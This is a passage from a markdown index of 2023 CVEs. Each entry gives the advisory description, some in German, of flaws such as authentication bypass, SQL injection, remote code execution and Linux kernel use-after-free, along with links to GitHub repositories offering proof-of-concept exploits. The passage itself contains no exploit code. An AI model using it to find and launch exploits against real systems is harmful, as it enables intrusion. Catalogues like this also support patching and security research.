[Cgv-Dev/Metasploit-Module-TFM](https://github.com/Cgv-Dev/Metasploit-Module-TFM) + +### CVE-2023-2732 (2023-05-25) + +The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. + + +- [RandomRobbieBF/CVE-2023-2732](https://github.com/RandomRobbieBF/CVE-2023-2732) +- [Jenderal92/WP-CVE-2023-2732](https://github.com/Jenderal92/WP-CVE-2023-2732) +- [ThatNotEasy/CVE-2023-2732](https://github.com/ThatNotEasy/CVE-2023-2732) + +### CVE-2023-2744 (2023-06-27) + +The ERP WordPress plugin before 1.12.4 does not properly sanitise and escape the `type` parameter in the `erp/v1/accounting/v1/people` REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. + + +- [pashayogi/CVE-2023-2744](https://github.com/pashayogi/CVE-2023-2744) + +### CVE-2023-2822 (2023-05-20) + +Es wurde eine problematische Schwachstelle in Ellucian Ethos Identity bis 5.10.5 ausgemacht. Hiervon betroffen ist ein unbekannter Codeblock der Datei /cas/logout. Durch Manipulation des Arguments url mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 5.10.6 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [cberman/CVE-2023-2822-demo](https://github.com/cberman/CVE-2023-2822-demo) + +### CVE-2023-2825 (2023-05-26) + +An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups. + + +- [Occamsec/CVE-2023-2825](https://github.com/Occamsec/CVE-2023-2825) +- [yuimarudev/CVE-2023-2825](https://github.com/yuimarudev/CVE-2023-2825) +- [Tornad0007/CVE-2023-2825-Gitlab](https://github.com/Tornad0007/CVE-2023-2825-Gitlab) +- [Rubikcuv5/CVE-2023-2825](https://github.com/Rubikcuv5/CVE-2023-2825) +- [caopengyan/CVE-2023-2825](https://github.com/caopengyan/CVE-2023-2825) +- [cc3305/CVE-2023-2825](https://github.com/cc3305/CVE-2023-2825) + +### CVE-2023-2833 (2023-06-06) + +The ReviewX plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.6.13 due to insufficient restriction on the 'rx_set_screen_options' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_screen_options[option]' and 'wp_screen_options[value]' parameters during a screen option update. + + +- [Alucard0x1/CVE-2023-2833](https://github.com/Alucard0x1/CVE-2023-2833) + +### CVE-2023-2859 (2023-05-24) + +Code Injection in GitHub repository nilsteampassnet/teampass prior to 3.0.9. + + +- [mnqazi/CVE-2023-2859](https://github.com/mnqazi/CVE-2023-2859) + +### CVE-2023-2868 (2023-05-24) + +A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product effecting versions 5.1.3.001-9.2.0.006. The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product. This issue was fixed as part of BNSF-36456 patch. This patch was automatically applied to all customer appliances. + + +- [cfielding-r7/poc-cve-2023-2868](https://github.com/cfielding-r7/poc-cve-2023-2868) +- [cashapp323232/CVE-2023-2868CVE-2023-2868](https://github.com/cashapp323232/CVE-2023-2868CVE-2023-2868) +- [krmxd/CVE-2023-2868](https://github.com/krmxd/CVE-2023-2868) + +### CVE-2023-2877 (2023-06-27) + +The Formidable Forms WordPress plugin before 6.3.1 does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution. + + +- [RandomRobbieBF/CVE-2023-2877](https://github.com/RandomRobbieBF/CVE-2023-2877) + +### CVE-2023-2916 (2023-08-15) + +The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.11.1 via the 'admin_notice' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including configuration. It can only be exploited if the plugin has not been configured yet. If combined with another arbitrary plugin installation and activation vulnerability, it may be possible to connect a site to InfiniteWP which would make remote management possible and allow for elevation of privileges. + + +- [d0rb/CVE-2023-2916](https://github.com/d0rb/CVE-2023-2916) + +### CVE-2023-2928 (2023-05-27) + +In DedeCMS bis 5.7.106 wurde eine kritische Schwachstelle ausgemacht. Dabei geht es um eine nicht genauer bekannte Funktion der Datei uploads/dede/article_allowurl_edit.php. Durch das Manipulieren des Arguments allurls mit unbekannten Daten kann eine code injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [CN016/DedeCMS-getshell-CVE-2023-2928-](https://github.com/CN016/DedeCMS-getshell-CVE-2023-2928-) + +### CVE-2023-2951 (2023-05-28) + +Es wurde eine kritische Schwachstelle in code-projects Bus Dispatch and Information System 1.0 entdeckt. Es geht dabei um eine nicht klar definierte Funktion der Datei delete_bus.php. Durch die Manipulation des Arguments busid mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [Spr1te76/CVE-2023-2951](https://github.com/Spr1te76/CVE-2023-2951) + +### CVE-2023-2982 (2023-06-29) + +The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5. + + +- [RandomRobbieBF/CVE-2023-2982](https://github.com/RandomRobbieBF/CVE-2023-2982) +- [H4K6/CVE-2023-2982-POC](https://github.com/H4K6/CVE-2023-2982-POC) +- [LoaiEsam37/CVE-2023-2982](https://github.com/LoaiEsam37/CVE-2023-2982) +- [wshinkle/CVE-2023-2982](https://github.com/wshinkle/CVE-2023-2982) + +### CVE-2023-2986 (2023-06-08) + +The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.14.2. This is due to insufficient encryption on the user being supplied during the abandoned cart link decode through the plugin. This allows unauthenticated attackers to log in as users who have abandoned the cart, who are typically customers. Further security hardening was introduced in version 5.15.1 that ensures sites are no longer vulnerable through historical check-out links, and additional hardening was introduced in version 5.15.2 that ensured null key values wouldn't permit the authentication bypass. + + +- [Ayantaker/CVE-2023-2986](https://github.com/Ayantaker/CVE-2023-2986) +- [Alucard0x1/CVE-2023-2986](https://github.com/Alucard0x1/CVE-2023-2986) + +### CVE-2023-3009 (2023-05-31) + +Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9. + + +- [mnqazi/CVE-2023-3009](https://github.com/mnqazi/CVE-2023-3009) + +### CVE-2023-3047 (2023-06-13) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TMT Lockcell allows SQL Injection.This issue affects Lockcell: before 15.\n\n + + +- [Phamchie/CVE-2023-3047](https://github.com/Phamchie/CVE-2023-3047) +- [Kimsovannareth/Phamchie](https://github.com/Kimsovannareth/Phamchie) + +### CVE-2023-3076 (2023-07-10) + +The MStore API WordPress plugin before 3.9.9 does not prevent visitors from creating user accounts with the role of their choice via their wholesale REST API endpoint. This is only exploitable if the site owner paid to access the plugin's pro features. + + +- [im-hanzou/MSAPer](https://github.com/im-hanzou/MSAPer) + +### CVE-2023-3079 (2023-06-05) + +Type confusion in V8 in Google Chrome prior to 114.0.5735.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [mistymntncop/CVE-2023-3079](https://github.com/mistymntncop/CVE-2023-3079) + +### CVE-2023-3124 (2023-06-07) + +The Elementor Pro plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_page_option function in versions up to, and including, 3.11.6. This makes it possible for authenticated attackers with subscriber-level capabilities to update arbitrary site options, which can lead to privilege escalation. + + +- [AmirWhiteHat/CVE-2023-3124](https://github.com/AmirWhiteHat/CVE-2023-3124) + +### CVE-2023-3163 (2023-06-08) + +Es wurde eine problematische Schwachstelle in y_project RuoYi bis 4.7.7 ausgemacht. Es betrifft die Funktion filterKeyword. Mit der Manipulation des Arguments value mit unbekannten Daten kann eine resource consumption-Schwachstelle ausgenutzt werden. + + +- [George0Papasotiriou/CVE-2023-3163-SQL-Injection-Prevention](https://github.com/George0Papasotiriou/CVE-2023-3163-SQL-Injection-Prevention) + +### CVE-2023-3244 (2023-08-17) + +The Comments Like Dislike plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the restore_settings function called via an AJAX action in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to reset the plugin's settings. NOTE: After attempting to contact the developer with no response, and reporting this to the WordPress plugin's team 30 days ago we are disclosing this issue as it still is not updated. + + +- [drnull03/POC-CVE-2023-3244](https://github.com/drnull03/POC-CVE-2023-3244) + +### CVE-2023-3269 (2023-07-11) + +A vulnerability exists in the memory management subsystem of the Linux kernel. The lock handling for accessing and updating virtual memory areas (VMAs) is incorrect, leading to use-after-free problems. This issue can be successfully exploited to execute arbitrary kernel code, escalate containers, and gain root privileges. + + +- [lrh2000/StackRot](https://github.com/lrh2000/StackRot) + +### CVE-2023-3338 (2023-06-30) + +A null pointer dereference flaw was found in the Linux kernel's DECnet networking protocol. This issue could allow a remote user to crash the system. + + +- [TurtleARM/CVE-2023-3338-DECPwn](https://github.com/TurtleARM/CVE-2023-3338-DECPwn) + +### CVE-2023-3390 (2023-06-28) + +A use-after-free vulnerability was found in the Linux kernel's netfilter subsystem in net/netfilter/nf_tables_api.c.\n\nMishandled error handling with NFT_MSG_NEWRULE makes it possible to use a dangling pointer in the same transaction causing a use-after-free vulnerability. This flaw allows a local attacker with user access to cause a privilege escalation issue.\n\nWe recommend upgrading past commit 1240eb93f0616b21c675416516ff3d74798fdc97. + + +- [flygonty/CVE-2023-3390_PoC](https://github.com/flygonty/CVE-2023-3390_PoC) + +### CVE-2023-3450 (2023-06-28) + +Eine kritische Schwachstelle wurde in Ruijie RG-BCR860 2.5.13 gefunden. Dies betrifft einen unbekannten Teil der Komponente Network Diagnostic Page. Durch das Manipulieren mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [yuanjinyuyuyu/CVE-2023-3450](https://github.com/yuanjinyuyuyu/CVE-2023-3450) +- [caopengyan/CVE-2023-3450](https://github.com/caopengyan/CVE-2023-3450) + +### CVE-2023-3452 (2023-08-12) + +The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server. + + +- [leoanggal1/CVE-2023-3452-PoC](https://github.com/leoanggal1/CVE-2023-3452-PoC) + +### CVE-2023-3460 (2023-07-04) + +The Ultimate Member WordPress plugin before 2.6.7 does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild. + + +- [gbrsh/CVE-2023-3460](https://github.com/gbrsh/CVE-2023-3460) +- [rizqimaulanaa/CVE-2023-3460](https://github.com/rizqimaulanaa/CVE-2023-3460) +- [yon3zu/Mass-CVE-2023-3460](https://github.com/yon3zu/Mass-CVE-2023-3460) +- [EmadYaY/CVE-2023-3460](https://github.com/EmadYaY/CVE-2023-3460) +- [diego-tella/CVE-2023-3460](https://github.com/diego-tella/CVE-2023-3460) +- [Rajneeshkarya/CVE-2023-3460](https://github.com/Rajneeshkarya/CVE-2023-3460) +- [DiMarcoSK/CVE-2023-3460_POC](https://github.com/DiMarcoSK/CVE-2023-3460_POC) +- [julienbrs/exploit-CVE-2023-3460](https://github.com/julienbrs/exploit-CVE-2023-3460) + +### CVE-2023-3519 (2023-07-19) + +Unauthenticated remote code execution\n + + +- [telekom-security/cve-2023-3519-citrix-scanner](https://github.com/telekom-security/cve-2023-3519-citrix-scanner) +- [securekomodo/citrixInspector](https://github.com/securekomodo/citrixInspector) +- [mr-r3b00t/CVE-2023-3519](https://github.com/mr-r3b00t/CVE-2023-3519) +- [d0rb/CVE-2023-3519](https://github.com/d0rb/CVE-2023-3519) +- [BishopFox/CVE-2023-3519](https://github.com/BishopFox/CVE-2023-3519) +- [SalehLardhi/CVE-2023-3519](https://github.com/SalehLardhi/CVE-2023-3519) +- [KR0N-SECURITY/CVE-2023-3519](https://github.com/KR0N-SECURITY/CVE-2023-3519) +- [passwa11/CVE-2023-3519](https://github.com/passwa11/CVE-2023-3519) +- [rwincey/cve-2023-3519](https://github.com/rwincey/cve-2023-3519) +- [mandiant/citrix-ioc-scanner-cve-2023-3519](https://github.com/mandiant/citrix-ioc-scanner-cve-2023-3519) +- [Chocapikk/CVE-2023-3519](https://github.com/Chocapikk/CVE-2023-3519) +- [JonaNeidhart/CVE-2023-3519-BackdoorCheck](https://github.com/JonaNeidhart/CVE-2023-3519-BackdoorCheck) +- [Mohammaddvd/CVE-2023-3519](https://github.com/Mohammaddvd/CVE-2023-3519) + +### CVE-2023-3640 (2023-07-24) + +A possible unauthorized memory access flaw was found in the Linux kernel's cpu_entry_area mapping of X86 CPU data to memory, where a user may guess the location of exception stacks or other important data. Based on the previous CVE-2023-0597, the 'Randomize per-cpu entry area' feature was implemented in /arch/x86/mm/cpu_entry_area.c, which works through the init_cea_offsets() function when KASLR is enabled. However, despite this feature, there is still a risk of per-cpu entry area leaks. This issue could allow a local user to gain access to some important data with memory in an expected location and potentially escalate their privileges on the system. + + +- [pray77/CVE-2023-3640](https://github.com/pray77/CVE-2023-3640) + +### CVE-2023-3710 (2023-09-12) + +Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n + + +- [vpxuser/CVE-2023-3710-POC](https://github.com/vpxuser/CVE-2023-3710-POC) + +### CVE-2023-3711 (2023-09-12) + +Session Fixation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Session Credential Falsification through Prediction.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n + + +- [vpxuser/CVE-2023-3711-POC](https://github.com/vpxuser/CVE-2023-3711-POC) + +### CVE-2023-3712 (2023-09-12) + +Files or Directories Accessible to External Parties vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Privilege Escalation.This issue affects PM43 versions prior to P10.19.050004. \n\nUpdate to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n + + +- [vpxuser/CVE-2023-3712-POC](https://github.com/vpxuser/CVE-2023-3712-POC) + +### CVE-2023-3722 (2023-07-19) + +An OS command injection vulnerability was found in the Avaya Aura Device Services Web application which could allow remote code execution as the Web server user via a malicious uploaded file. This issue affects Avaya Aura Device Services version 8.1.4.0 and earlier. + + +- [pizza-power/CVE-2023-3722](https://github.com/pizza-power/CVE-2023-3722) + +### CVE-2023-3824 (2023-08-11) + +In PHP version 8.0.* before 8.0.30,  8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. \n\n + + +- [Starla2u/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK](https://github.com/Starla2u/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK) +- [jhonnybonny/CVE-2023-3824](https://github.com/jhonnybonny/CVE-2023-3824) +- [baesh3r/poc-CVE-2023-3824](https://github.com/baesh3r/poc-CVE-2023-3824) + +### CVE-2023-3836 (2023-07-22) + +In Dahua Smart Park Management bis 20230713 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /emap/devicePoint_addImgIco?hasSubsystem=true. Durch Manipulation des Arguments upload mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [zh-byte/CVE-2023-3836](https://github.com/zh-byte/CVE-2023-3836) + +### CVE-2023-3881 (2023-07-25) + +In Campcodes Beauty Salon Management System 1.0 wurde eine kritische Schwachstelle entdeckt. Dabei geht es um eine nicht genauer bekannte Funktion der Datei /admin/forgot-password.php. Durch Manipulieren des Arguments contactno mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [AnugiArrawwala/CVE-Research](https://github.com/AnugiArrawwala/CVE-Research) + +### CVE-2023-3897 (2023-07-25) + +\nUsername enumeration is possible through Bypassing CAPTCHA in On-premise SureMDM Solution on Windows deployment allows attacker to enumerate local user information via error message.\n\nThis issue affects SureMDM On-premise: 6.31 and below version \n\n + + +- [jFriedli/CVE-2023-3897](https://github.com/jFriedli/CVE-2023-3897) + +### CVE-2023-3971 (2023-10-04) + +An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise. + + +- [ashangp923/CVE-2023-3971](https://github.com/ashangp923/CVE-2023-3971) + +### CVE-2023-4128 +- [Trinadh465/linux-4.1.15_CVE-2023-4128](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-4128) + +### CVE-2023-4145 (2023-08-03) + +Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/customer-data-framework prior to 3.4.2. + + +- [miguelc49/CVE-2023-4145-2](https://github.com/miguelc49/CVE-2023-4145-2) +- [miguelc49/CVE-2023-4145-1](https://github.com/miguelc49/CVE-2023-4145-1) +- [miguelc49/CVE-2023-4145-3](https://github.com/miguelc49/CVE-2023-4145-3) + +### CVE-2023-4165 (2023-08-05) + +Es wurde eine kritische Schwachstelle in Tongda OA gefunden. Hiervon betroffen ist ein unbekannter Codeblock der Datei general/system/seal_manage/iweboffice/delete_seal.php. Dank der Manipulation des Arguments DELETE_STR mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 11.10 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [mvpyyds/CVE-2023-4165](https://github.com/mvpyyds/CVE-2023-4165) + +### CVE-2023-4166 (2023-08-05) + +In Tongda OA wurde eine kritische Schwachstelle gefunden. Betroffen ist eine unbekannte Verarbeitung der Datei general/system/seal_manage/dianju/delete_log.php. Dank Manipulation des Arguments DELETE_STR mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 11.10 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [mvpyyds/CVE-2023-4166](https://github.com/mvpyyds/CVE-2023-4166) + +### CVE-2023-4169 (2023-08-05) + +In Ruijie RG-EW1200G 1.0(1)B1P5 wurde eine kritische Schwachstelle ausgemacht. Es geht um eine nicht näher bekannte Funktion der Datei /api/sys/set_passwd der Komponente Administrator Password Handler. Durch Manipulation mit unbekannten Daten kann eine improper access controls-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [thedarknessdied/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415](https://github.com/thedarknessdied/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415) + +### CVE-2023-4174 (2023-08-06) + +In mooSocial mooStore 3.1.6 wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Hierbei betrifft es unbekannten Programmcode. Mittels Manipulieren mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. + + +- [d0rb/CVE-2023-4174](https://github.com/d0rb/CVE-2023-4174) + +### CVE-2023-4197 (2023-11-01) + +Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code. + + +- [alien-keric/CVE-2023-4197](https://github.com/alien-keric/CVE-2023-4197) + +### CVE-2023-4206 (2023-09-06) + +A use-after-free vulnerability in the Linux kernel's net/sched: cls_route component can be exploited to achieve local privilege escalation.\n\nWhen route4_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.\n\nWe recommend upgrading past commit b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8.\n\n + + +- [hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208](https://github.com/hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208) + +### CVE-2023-4220 (2023-11-28) + +Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell. + + +- [m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc](https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc) +- [dollarboysushil/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220](https://github.com/dollarboysushil/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220) +- [charlesgargasson/CVE-2023-4220](https://github.com/charlesgargasson/CVE-2023-4220) +- [insomnia-jacob/CVE-2023-4220](https://github.com/insomnia-jacob/CVE-2023-4220) +- [Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit](https://github.com/Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit) +- [HO4XXX/cve-2023-4220-poc](https://github.com/HO4XXX/cve-2023-4220-poc) +- [B1TC0R3/CVE-2023-4220-PoC](https://github.com/B1TC0R3/CVE-2023-4220-PoC) +- [nr4x4/CVE-2023-4220](https://github.com/nr4x4/CVE-2023-4220) +- [Al3xGD/CVE-2023-4220-Exploit](https://github.com/Al3xGD/CVE-2023-4220-Exploit) +- [charchit-subedi/chamilo-lms-unauthenticated-rce-poc](https://github.com/charchit-subedi/chamilo-lms-unauthenticated-rce-poc) +- [LGenAgul/CVE-2023-4220-Proof-of-concept](https://github.com/LGenAgul/CVE-2023-4220-Proof-of-concept) +- [VanishedPeople/CVE-2023-4220](https://github.com/VanishedPeople/CVE-2023-4220) +- [thefizzyfish/CVE-2023-4220_Chamilo_RCE](https://github.com/thefizzyfish/CVE-2023-4220_Chamilo_RCE) +- [qrxnz/CVE-2023-4220](https://github.com/qrxnz/CVE-2023-4220) +- [0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit](https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit) +- [bueno-armando/CVE-2023-4220-RCE](https://github.com/bueno-armando/CVE-2023-4220-RCE) +- [0xDTC/Chamilo-LMS-CVE-2023-4220-Exploit](https://github.com/0xDTC/Chamilo-LMS-CVE-2023-4220-Exploit) +- [H4cking4All/CVE-2023-4220](https://github.com/H4cking4All/CVE-2023-4220) +- [oxapavan/CVE-2023-4220-HTB-PermX](https://github.com/oxapavan/CVE-2023-4220-HTB-PermX) +- [numaan911098/CVE-2023-4220](https://github.com/numaan911098/CVE-2023-4220) + +### CVE-2023-4226 (2023-11-28) + +Unrestricted file upload in `/main/inc/ajax/work.ajax.php` in Chamilo LMS <= v1.11.24 allows authenticated attackers with learner role to obtain remote code execution via uploading of PHP files. + + +- [krishnan-tech/CVE-2023-4226-POC](https://github.com/krishnan-tech/CVE-2023-4226-POC) + +### CVE-2023-4278 (2023-09-11) + +The MasterStudy LMS WordPress Plugin WordPress plugin before 3.0.18 does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and/or posts. + + +- [revan-ar/CVE-2023-4278](https://github.com/revan-ar/CVE-2023-4278) + +### CVE-2023-4279 (2023-09-04) + +This User Activity Log WordPress plugin before 1.6.7 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic. + + +- [b0marek/CVE-2023-4279](https://github.com/b0marek/CVE-2023-4279) + +### CVE-2023-4281 (2023-09-25) + +This Activity Log WordPress plugin before 2.8.8 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic. + + +- [b0marek/CVE-2023-4281](https://github.com/b0marek/CVE-2023-4281) + +### CVE-2023-4294 (2023-09-11) + +The URL Shortify WordPress plugin before 1.7.6 does not properly escape the value of the referer header, thus allowing an unauthenticated attacker to inject malicious javascript that will trigger in the plugins admin panel with statistics of the created short link. + + +- [b0marek/CVE-2023-4294](https://github.com/b0marek/CVE-2023-4294) + +### CVE-2023-4300 (2023-09-25) + +The Import XML and RSS Feeds WordPress plugin before 2.1.4 does not filter file extensions for uploaded files, allowing an attacker to upload a malicious PHP file, leading to Remote Code Execution. + + +- [bde574786/CVE-2023-4300](https://github.com/bde574786/CVE-2023-4300) + +### CVE-2023-4357 (2023-08-15) + +Insufficient validation of untrusted input in XML in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to bypass file access restrictions via a crafted HTML page. (Chromium security severity: Medium) + + +- [xcanwin/CVE-2023-4357-Chrome-XXE](https://github.com/xcanwin/CVE-2023-4357-Chrome-XXE) +- [OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation](https://github.com/OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation) +- [passwa11/CVE-2023-4357-APT-Style-exploitation](https://github.com/passwa11/CVE-2023-4357-APT-Style-exploitation) +- [sunu11/chrome-CVE-2023-4357](https://github.com/sunu11/chrome-CVE-2023-4357) +- [WinnieZy/CVE-2023-4357](https://github.com/WinnieZy/CVE-2023-4357) +- [lon5948/CVE-2023-4357-Exploitation](https://github.com/lon5948/CVE-2023-4357-Exploitation) +- [CamillaFranceschini/CVE-2023-4357](https://github.com/CamillaFranceschini/CVE-2023-4357) + +### CVE-2023-4427 (2023-08-22) + +Out of bounds memory access in V8 in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) + + +- [tianstcht/CVE-2023-4427](https://github.com/tianstcht/CVE-2023-4427) + +### CVE-2023-4450 (2023-08-21) + +In jeecgboot JimuReport bis 1.6.0 wurde eine kritische Schwachstelle ausgemacht. Das betrifft eine unbekannte Funktionalität der Komponente Template Handler. Durch Manipulation mit unbekannten Daten kann eine injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 1.6.1 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [ilikeoyt/CVE-2023-4450-Attack](https://github.com/ilikeoyt/CVE-2023-4450-Attack) + +### CVE-2023-4460 (2023-12-04) + +The Uploading SVG, WEBP and ICO files WordPress plugin through 1.2.1 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads. + + +- [0xn4d/poc-cve-xss-uploading-svg](https://github.com/0xn4d/poc-cve-xss-uploading-svg) + +### CVE-2023-4542 (2023-08-25) + +Es wurde eine Schwachstelle in D-Link DAR-8000-10 bis 20230809 ausgemacht. Sie wurde als kritisch eingestuft. Es geht dabei um eine nicht klar definierte Funktion der Datei /app/sys1.php. Durch das Manipulieren des Arguments cmd mit der Eingabe id mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [PumpkinBridge/CVE-2023-4542](https://github.com/PumpkinBridge/CVE-2023-4542) + +### CVE-2023-4549 (2023-09-25) + +The DoLogin Security WordPress plugin before 3.7 does not properly sanitize IP addresses coming from the X-Forwarded-For header, which can be used by attackers to conduct Stored XSS attacks via WordPress' login form. + + +- [b0marek/CVE-2023-4549](https://github.com/b0marek/CVE-2023-4549) + +### CVE-2023-4568 (2023-09-13) + +PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch. + + +- [Cappricio-Securities/CVE-2023-4568](https://github.com/Cappricio-Securities/CVE-2023-4568) + +### CVE-2023-4590 (2023-11-27) + +Buffer overflow vulnerability in Frhed hex editor, affecting version 1.6.0. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument through the Structured Exception Handler (SEH) registers. + + +- [dgndrn/CVE-2023-4590](https://github.com/dgndrn/CVE-2023-4590) + +### CVE-2023-4596 (2023-08-30) + +The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the 